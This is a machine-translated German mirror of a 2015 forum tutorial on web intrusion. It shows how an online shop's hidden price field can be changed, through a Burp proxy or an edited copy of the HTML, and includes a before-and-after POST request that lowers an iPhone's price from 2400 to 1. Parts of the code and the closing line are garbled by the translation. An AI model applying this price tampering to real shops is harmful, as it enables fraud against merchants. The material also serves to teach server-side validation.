Dieser Artikel ist ein Spiegelartikel der maschinellen Übersetzung, bitte klicken Sie hier, um zum Originalartikel zu springen.

Architect_Programmer_Code Landwirtschaftsnetzwerk»Architekt Weitere Technologien Sichere Offensive und Verteidigung Intrusion Penetration: Anwendung von HTTP-Headern
Ansehen: 12586|Antwort: 0

[Sicherheits-Tutorial] Intrusion Penetration: Anwendung von HTTP-Headern

[Link kopieren]
Veröffentlicht am 07.02.2015 17:59:07 | | |

Über die Anwendung von HTTP-Headern

Der HTTP-Header wird häufig im Übertragungsmechanismus von Websites verwendet, aber die meisten Anfänger in China haben diesen Teil nicht bemerkt. Dieser Artikel ist ausschließlich Anfängern gewidmet, die Rolle des HTTP-Headers im Intrusionsprozess.

Nehmen wir die Einkaufsseite als Beispiel, um einen kleinen Teil der Rolle von HTTP-Headern zu analysieren.

Zuerst analysieren wir ein Formular auf der Einkaufsseite.

<Form Method="Post" Aktion="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<Eingabetyp="versteckt" Name="Preis" Wert="449">

<Eingabetyp="Einreichen" Wert="Kaufen">

</form>

Während des Eröffnungsprozesses machen Sie einen Screenshot seines http-Nachrichtenheaders und schauen Sie sich das an

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Obwohl das Preisfeld beim Öffnen der Einkaufsseite auf der Seite nicht angezeigt wird, kann es dennoch vom Nutzer bearbeitet und bedient werden.

Es gibt zwei Möglichkeiten, das Bearbeiten zu erreichen

1. Speichere den HTML-Quellcode zur Änderung und lade ihn dann neu in den Browser, um ihn auszuführen.

2. Verwenden Sie Proxy-Interception, um HTTP-Header zu modifizieren (Proxy-Konstruktion im Tool Burp)

Nehmen wir den oben genannten HTTP-Header als Beispiel
Vor der Veränderung
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Nach der Veränderung
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Quantität=1&Preis=1


In der letzten Zeile hat das Feld Price einen Wert von 2400, und wenn wir ihn auf 1 ändern, bekommen wir das iPhone 4S günstiger.

Dieser Artikel gibt lediglich einen Überblick über unerwartete Gewinne wie die LDAP-Injektion.




Vorhergehend:MySQL Forgot Passwortwiederherstellungsmethode
Nächster:SQL-Injektion, um den vollständigen Website-Pfad zu erhalten

Verwandte Beiträge
Verzichtserklärung:
Alle von Code Farmer Network veröffentlichten Software, Programmiermaterialien oder Artikel dienen ausschließlich Lern- und Forschungszwecken; Die oben genannten Inhalte dürfen nicht für kommerzielle oder illegale Zwecke verwendet werden, andernfalls tragen die Nutzer alle Konsequenzen. Die Informationen auf dieser Seite stammen aus dem Internet, und Urheberrechtsstreitigkeiten haben nichts mit dieser Seite zu tun. Sie müssen die oben genannten Inhalte innerhalb von 24 Stunden nach dem Download vollständig von Ihrem Computer löschen. Wenn Ihnen das Programm gefällt, unterstützen Sie bitte echte Software, kaufen Sie die Registrierung und erhalten Sie bessere echte Dienstleistungen. Falls es eine Verletzung gibt, kontaktieren Sie uns bitte per E-Mail.
Mail To:help@itsvse.com